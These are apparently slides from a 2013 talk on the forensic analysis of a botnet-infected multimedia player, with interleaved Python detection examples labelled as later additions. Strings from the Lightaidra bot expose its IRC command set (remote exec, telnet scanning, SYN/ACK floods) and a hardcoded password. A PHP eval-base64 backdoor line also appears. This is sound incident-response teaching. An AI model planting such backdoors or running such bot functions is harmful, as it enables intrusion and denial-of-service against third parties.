2013 Kdo najde bota

Kdo najde bota? [email protected] HEK.SI 12.4.2013

Description

Analysis of a compromised multimedia player


Page 1: 2013 Kdo najde bota

Kdo najde bota? (Who will find the bot?)

[email protected]

HEK.SI, 12.4.2013

Page 2: 2013 Kdo najde bota

Dear xxx friends,

I’m DarkRobinHood, me and my friends we live in the Internet environments. Like my namesake used me to give equity in this world, I don’t like to steal, perhaps I prefer to invite people like you that works in the financial and economic markets, in general on the freedom and democracy’s, coming to us. The increased taxes, your arrogance and your injustice way to take money from us, only to deceive people that you are doing a honest job, got my attention.

I’d like to invite you, with kindness, to give 75BTC before 12:00 (GMT+1) on 10/16/2012 to the next Bitcoin Address: 1k966rggo3h85URb5unrXexxxxxxxxxxxxxxx . This money is going to be used for our noble cause. If you don’t get my apeal we’ll find ourselves in a position to gap you, to kick you out of our country.

Showing that I’m not talking nosense, even this night you will have a small taste of what it will happen to you. My honor doesn’t let me to abey you in such way, it should be a lesson for you of thinking before you do something.

Sincerely, Dark Robin Hood

Page 3: 2013 Kdo najde bota
Page 4: 2013 Kdo najde bota
Page 5: 2013 Kdo najde bota
Page 6: 2013 Kdo najde bota

$ nmap 89.xxx.xxx.xxx

Starting Nmap 5.00 ( http://nmap.org ) at 2012-10-18 13:27 CEST
Interesting ports on 89.xxx.xxx.xxx:
Not shown: 991 closed ports
PORT     STATE    SERVICE
23/tcp   open     telnet
25/tcp   filtered smtp
80/tcp   open     http
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
1025/tcp filtered NFS-or-IIS

Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds

Page 7: 2013 Kdo najde bota

$ telnet 89.xxx.xxx.xxx
Trying 89.xxx.xxx.xxx...
Connected to 89.xxx.xxx.xxx.
Escape character is '^]'.

Venus login: root
warning: cannot change to home directory

BusyBox v1.1.3 (2010.09.07-08:50+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux Venus 2.6.12.6-VENUS #323635 Tue Sep 7 16:49:31 CST 2010 mips unknown

Page 8: 2013 Kdo najde bota

# find / -ctime -10 -print        # ps -ef
# find / -mtime -5 -ls            # lsof -np PID
# find / -amin -120 -print        # lsof -ni TCP:22
# stat somefile                   # pstree -aAp
# cat .bash_history               # last -i
# crontab                         # file somefile.bin
# ls -lAct                        # strings somefile.bin
# ls -l /proc/PID/                # less /var/log/secure
# chkrootkit                      # less /var/log/access.log
# rkhunter                        # netstat -anpt

Page 9: 2013 Kdo najde bota

# netstat -aen
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      1 89.xxx.xxx.xxx:4229     165.91.24.5:23          SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:1457     165.91.24.80:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:4935     165.91.24.22:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2247     165.91.24.76:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:3836     165.91.24.42:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:3523     165.91.24.41:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2127     165.91.24.60:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:5641     37.xx.xx.xx:65535       ESTABLISHED
tcp        0      1 89.xxx.xxx.xxx:2580     165.91.24.126:23        SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2768     165.91.24.77:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:4224     165.91.24.39:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:1981     165.91.24.16:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2496     165.91.24.110:23        SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2500     165.91.24.30:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:4526     165.91.24.70:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2720     165.91.24.93:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:4865     165.91.24.4:23          SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:3356     165.91.24.26:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:1659     165.91.24.1:23          SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:1786     165.91.24.96:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:1981     165.91.24.17:23         SYN_SENT
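The netstat listing above carries the two signals a responder looks for: a burst of half-open (SYN_SENT) connections to port 23 on consecutive hosts of one /24, and a single ESTABLISHED session to an unusual high port. The following added example (not part of the original slides) parses netstat -an style output and flags both; the input is a constructed excerpt of the slide's listing, and the set of remote ports treated as "expected" for a media player is an assumption.

```python
import re

# Constructed sample: an excerpt of the netstat -aen listing from the slide above
# (same addresses, masked as on the slide), used here as test input.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      1 89.xxx.xxx.xxx:4229     165.91.24.5:23          SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:1457     165.91.24.80:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:4935     165.91.24.22:23         SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:5641     37.xx.xx.xx:65535       ESTABLISHED
tcp        0      1 89.xxx.xxx.xxx:2580     165.91.24.126:23        SYN_SENT
tcp        0      1 89.xxx.xxx.xxx:2768     165.91.24.77:23         SYN_SENT
"""

# proto, Recv-Q, Send-Q, local addr:port, foreign addr:port, state
CONN_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+(\S+):(\S+)\s+(\S+):(\S+)\s+(\S+)$")


def _port(text):
    """Numeric port as int; '*' (any) is kept as a string."""
    return int(text) if text.isdigit() else text


def parse_netstat(text):
    """Turn netstat -an style output into a list of connection dicts; header lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if not m:
            continue
        proto, laddr, lport, faddr, fport, state = m.groups()
        conns.append({"proto": proto, "laddr": laddr, "lport": _port(lport),
                      "faddr": faddr, "fport": _port(fport), "state": state})
    return conns


def detect_scanning(conns, min_half_open=5):
    """Remote ports to which at least min_half_open distinct hosts are being contacted
    with half-open (SYN_SENT) connections at the same time: the footprint of a host
    sweeping a network for one service, here telnet on 23."""
    targets = {}
    for c in conns:
        if c["state"] == "SYN_SENT":
            targets.setdefault(c["fport"], set()).add(c["faddr"])
    return {port: len(hosts) for port, hosts in targets.items() if len(hosts) >= min_half_open}


# Assumption for this example: remote ports an embedded media player could plausibly
# contact on its own (DNS, HTTP, NTP, HTTPS).
EXPECTED_REMOTE_PORTS = frozenset({53, 80, 123, 443})


def suspicious_established(conns, expected=EXPECTED_REMOTE_PORTS):
    """Established outbound sessions to an unexpected remote port (65535 on the slide):
    candidates for a command-and-control channel, to be checked against strings/pcap."""
    return [c for c in conns
            if c["state"] == "ESTABLISHED" and c["fport"] not in expected]


if __name__ == "__main__":
    conns = parse_netstat(NETSTAT_OUTPUT)
    print("scan targets (port -> distinct hosts):", detect_scanning(conns))
    for c in suspicious_established(conns):
        print("possible C2 session:", c["faddr"], c["fport"])
```

The threshold of five distinct hosts is deliberately low because on a busy device it is the combination (many SYN_SENT to the same service plus one long-lived session to a non-standard port) that matters, not either signal on its own.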

Page 10: 2013 Kdo najde bota

# ps aux
  PID Uid      VmSize Stat Command
    1 root        380 S    init
    2 root            SWN  [ksoftirqd/0]
    3 root            SW<  [events/0]
    4 root            SW<  [khelper]
    5 root            SW<  [kthread]
    6 root            SW<  [kblockd/0]
    7 root            SW   [khubd]
    8 root            SW   [rpc-1]
    9 root            SW   [rpc-3]
   10 root            SW   [pdflush]
   11 root            SW   [pdflush]
   13 root            SW<  [aio/0]
   14 root            SW<  [cifsoplockd]
   15 root            SW<  [cifsdnotifyd]
   12 root            SW   [kswapd0]
   16 root            SW   [eth0]
   17 root            SW   [mtdblockd]
   29 root        384 S    init
   30 root        384 S    init
   33 root        384 S    init

Page 11: 2013 Kdo najde bota

  181 root        224 S    ./RootApp DvdPlayer
  182 root        224 S    ./RootApp DvdPlayer
 3191 root        184 S    msx
 3245 root        428 S    inetd
24399 root            Z    [msx]
25360 root       7780 R    DvdPlayer -s power
25361 root        224 S    ./RootApp DvdPlayer
25362 root       7780 S    DvdPlayer -s power
25363 root       7780 S N  DvdPlayer -s power
25364 root       7780 S N  DvdPlayer -s power
25376 root       7780 S    DvdPlayer -s power
25377 root       7780 S    DvdPlayer -s power
25381 root       7780 S    DvdPlayer -s power
25382 root       7780 S    DvdPlayer -s power
25383 root       7780 S    DvdPlayer -s power
25386 root       7780 S    DvdPlayer -s power
25387 root       7780 S    DvdPlayer -s power
25388 root       7780 S    DvdPlayer -s power
25389 root       7780 S    DvdPlayer -s power
25390 root       7780 S    DvdPlayer -s power
25391 root       7780 S    DvdPlayer -s power
25392 root       7780 S    DvdPlayer -s power
25393 root       7780 S    DvdPlayer -s power

Page 12: 2013 Kdo najde bota

# ls -lA /var/run
-rw-r--r-- 1 root root     45 Oct 16 10:37 .httpd_status
-rw-r--r-- 1 root root      5 Oct 18 11:08 .lightpid
-rw-r--r-- 1 root root      0 Oct 18 11:08 .lightscan
-rw-r--r-- 1 root root  22497 Oct 18 11:02 .scan.log
-rw-r--r-- 1 root root     67 Oct 18 11:07 .stats
-rwxr-xr-x 1 root root 203081 Oct 18 11:09 arm
-rwxr-xr-x 1 root root 204284 Oct 17 16:23 ax
-rw-r--r-- 1 root root      5 Oct 17 16:23 dhcp.pid
-rw-r--r-- 1 root root      6 Oct 17 16:23 inetd.pid
-rwxr-xr-x 1 root root 266266 Oct 18 11:09 mips
-rwxr-xr-x 1 root root 266327 Oct 18 11:08 mipsel
-rwxr-xr-x 1 root root 266294 Oct 17 16:23 msx
-rwxr-xr-x 1 root root 266201 Oct 17 16:23 mx
-rwxr-xr-x 1 root root 195648 Oct 18 11:09 ppc
-rwxr-xr-x 1 root root 196947 Oct 17 16:23 px
-rwxr-xr-x 1 root root   2211 Oct 18 11:07 run.chk
-rwxr-xr-x 1 root root 180529 Oct 18 11:09 sh
-rwxr-xr-x 1 root root 181348 Oct 17 16:23 sx
-rwxr-xr-x 1 root root  48480 Oct 18 11:09 x86_32
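A pid/state directory such as /var/run should hold a handful of tiny files and sockets; what the slide shows instead is a drop of per-architecture executables (arm, mips, mipsel, ppc, sh, x86_32 and their variants) plus hidden state files. The added example below (not from the original talk) audits a directory for exactly those anomalies: execute bits, hidden files that are not pid files, and sizes far beyond what a pid file needs. It rebuilds the slide's listing as sparse files in a temporary directory so it can be run offline; the 64 KiB size limit is an assumption.

```python
import os
import stat
import tempfile
from pathlib import Path

# Listing from the slide above as (name, execute bit, size in bytes); constructed from the
# page so the audit can be exercised on a throwaway copy of that /var/run.
SLIDE_LISTING = [
    (".httpd_status", False, 45), (".lightpid", False, 5), (".lightscan", False, 0),
    (".scan.log", False, 22497), (".stats", False, 67), ("arm", True, 203081),
    ("ax", True, 204284), ("dhcp.pid", False, 5), ("inetd.pid", False, 6),
    ("mips", True, 266266), ("mipsel", True, 266327), ("msx", True, 266294),
    ("mx", True, 266201), ("ppc", True, 195648), ("px", True, 196947),
    ("run.chk", True, 2211), ("sh", True, 180529), ("sx", True, 181348),
    ("x86_32", True, 48480),
]


def audit_run_dir(path, size_limit=64 * 1024):
    """Flag regular files under path that do not belong in a pid/state directory:
    anything with an execute bit, hidden files that are not *.pid, and files larger
    than size_limit (a pid file is a few bytes). Non-recursive; symlinks are not followed.
    Returns {'executable': [...], 'hidden': [...], 'large': [...]} with names sorted."""
    findings = {"executable": [], "hidden": [], "large": []}
    for entry in sorted(Path(path).iterdir()):
        st = entry.lstat()
        if not stat.S_ISREG(st.st_mode):
            continue  # sockets, fifos, directories and symlinks are out of scope here
        if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            findings["executable"].append(entry.name)
        if entry.name.startswith(".") and not entry.name.endswith(".pid"):
            findings["hidden"].append(entry.name)
        if st.st_size > size_limit:
            findings["large"].append(entry.name)
    return findings


def build_sample_dir(base, listing=SLIDE_LISTING):
    """Recreate the listing under base as sparse files with the right size and mode."""
    for name, is_exec, size in listing:
        p = Path(base) / name
        with open(p, "wb") as f:
            f.truncate(size)  # sparse: no need to write real bytes
        os.chmod(p, 0o755 if is_exec else 0o644)
    return base


def demo():
    """Audit the reconstructed directory and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_run_dir(build_sample_dir(tmp))


if __name__ == "__main__":
    for kind, names in demo().items():
        print(f"{kind}: {', '.join(names) or '-'}")
```

On a live box, point audit_run_dir at /var/run and /tmp directly (the talk's own triage list already has find -amin and ls -lAct for the time dimension); the mount-time and size checks here are the cheap complement to that.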

Page 13: 2013 Kdo najde bota
Page 14: 2013 Kdo najde bota

/tmp/etc # ftpput
BusyBox v1.1.3 (2010.09.07-08:50+0000) multi-call binary

Usage: ftpput [options] remote-host remote-file local-file

Store a local file on a remote machine via FTP.

Options:
	-v, --verbose	Verbose
	-u, --username	Username to be used
	-p, --password	Password to be used
	-P, --port	Port number to be used

Page 15: 2013 Kdo najde bota

$ strings msx
...
PRIVMSG %s :[login] you are logged in, (%s).
PRIVMSG %s :[!login] sorry, wrong authenthication password!
...
GET /n09230945.asp HTTP/1.0
Host: automation.whatismyip.com
%d.%d.%*s.%*s
...
xxxxxx.user32.com:65535
/var/run/.lightpid
0123456789abcdefghilmnopqrstuvzywkxABCDEFGHILMNOPQRSTUVZYWKX|:.*<>@_;:,.-+*^?=)(|AB&%$D"!
wkyxzvutsrqponmlihgfedcba~123456789
FUCK
#aidra
->%s%s %s
PASS
burruciaga123
NICK %s
USER pwn localhost * :Lightaidra ;)
TOPIC %s

Page 16: 2013 Kdo najde bota

PRIVMSG %s :* *** Access Commands:
PRIVMSG %s :*
PRIVMSG %s :* .login <password> - login to bot's party-line
PRIVMSG %s :* .logout - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
PRIVMSG %s :* *** EOF

Page 18: 2013 Kdo najde bota
Page 19: 2013 Kdo najde bota

$ ls -lA /var/log/httpd
total 42124
-rw-r----- 1 root adm 15761694 2013-02-27 14:17 access_log
-rw-r----- 1 root adm 23013951 2013-02-24 01:16 access_log.1
-rw-r----- 1 root adm  1339351 2013-02-24 01:17 access_log.2.gz
-rw-r----- 1 root adm  1412975 2013-02-17 01:17 access_log.3.gz
-rw-r----- 1 root adm  1531839 2013-02-10 01:17 access_log.4.gz

Page 20: 2013 Kdo najde bota
Page 21: 2013 Kdo najde bota

184.168.27.120 - - [25/Feb/2013:16:56:07 +0100] "POST /plugins/system/dvmessages/dvmessages.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"

Page 22: 2013 Kdo najde bota
Page 23: 2013 Kdo najde bota
Page 24: 2013 Kdo najde bota

<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
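The one-liner above is a Joomla plugin whose "or die()" guard has been swapped for an eval() of whatever arrives in the c_id request parameter, and the access-log line on the earlier slide is a client exercising it. The added example below (not part of the original talk) ties the two together from the defender's side: it scans PHP sources for eval() fed from a request variable, parses the access log, and reports requests whose path maps onto a flagged file. Both the plugin files and the log lines are constructed samples built around the page's own snippet and log entry; the document root and the clean "legacy" plugin are assumptions.

```python
import re

# Constructed sample: the slide's backdoored plugin beside a clean Joomla guard line.
PHP_FILES = {
    "/var/www/plugins/system/dvmessages/dvmessages.php":
        "<?php\ndefined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));\n",
    "/var/www/plugins/system/legacy/legacy.php":
        "<?php\ndefined('_JEXEC') or die('Restricted access');\n",
}

# Constructed access-log sample: the slide's POST plus two ordinary requests.
ACCESS_LOG = """\
184.168.27.120 - - [25/Feb/2013:16:56:07 +0100] "POST /plugins/system/dvmessages/dvmessages.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
10.0.0.5 - - [25/Feb/2013:16:57:01 +0100] "GET /index.php?option=com_content HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.6 - - [25/Feb/2013:16:58:20 +0100] "GET /plugins/system/legacy/legacy.php HTTP/1.1" 403 211 "-" "Mozilla/5.0"
"""

# eval() whose argument comes straight from a request variable, with or without the
# base64_decode wrapper and the @ error silencer seen on the slide.
BACKDOOR_RE = re.compile(
    r"@?eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)

# Apache combined format: client, ident, user, [time], "method path proto", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def find_backdoors(files):
    """Paths (sorted) of PHP sources matching the request-driven eval pattern."""
    return sorted(path for path, src in files.items() if BACKDOOR_RE.search(src))


def parse_access_log(text):
    """Parse combined-format log lines into dicts; the query string is dropped from path."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status, size = m.groups()
        hits.append({"ip": ip, "time": ts, "method": method,
                     "path": path.split("?", 1)[0], "status": int(status)})
    return hits


def backdoor_requests(files, log_text, docroot="/var/www"):
    """Log entries whose URL path resolves to a file flagged by find_backdoors."""
    flagged = {p[len(docroot):] for p in find_backdoors(files)}
    return [h for h in parse_access_log(log_text) if h["path"] in flagged]


if __name__ == "__main__":
    print("backdoor files:", find_backdoors(PHP_FILES))
    for h in backdoor_requests(PHP_FILES, ACCESS_LOG):
        print("backdoor hit:", h["ip"], h["method"], h["path"], h["status"])
```

For a real site, feed find_backdoors a dict built by walking the document root and read the rotated access_log.N.gz files as well as the live one; the slide's listing shows the earlier rotations are what cover the first contact.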